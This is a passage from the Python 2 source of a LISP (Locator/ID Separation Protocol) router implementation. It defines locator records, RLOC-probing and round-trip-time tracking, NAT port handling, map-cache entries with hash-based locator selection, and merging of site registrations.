"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This is a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state == LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state == LISP_RLOC_UP_STATE):
return("up-state")
if (self.state == LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state == LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state == LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
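#
# store_rloc_probe_hops() records the hop counts an RLOC-probe took in
# each direction as a "to/from" string. A "?" means the count is
# unknown and a "!" means the received TTL was suspiciously low (less
# than half of LISP_RLOC_PROBE_TTL); otherwise the value is the number
# of router hops derived from LISP_RLOC_PROBE_TTL minus the TTL seen.
#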
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl/60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
return(elapsed >= self.map_cache_ttl)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (which it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put the RLOC in lisp.lisp_rloc_probe_list if it isn't already there.
# And if we removed the RLOC from the best list, we need to remove
# its references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
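#
# select_rloc() is the data-plane RLOC selection path. It hashes the
# inner packet's addresses and ports, indexes the best-RLOC set with
# the hash, and skips to the next up RLOC when the chosen one is down.
# RLE and ELP entries take precedence over a plain RLOC address, and
# echo-nonce state may attach a nonce to the returned tuple.
#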
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None,self.action, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting a nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
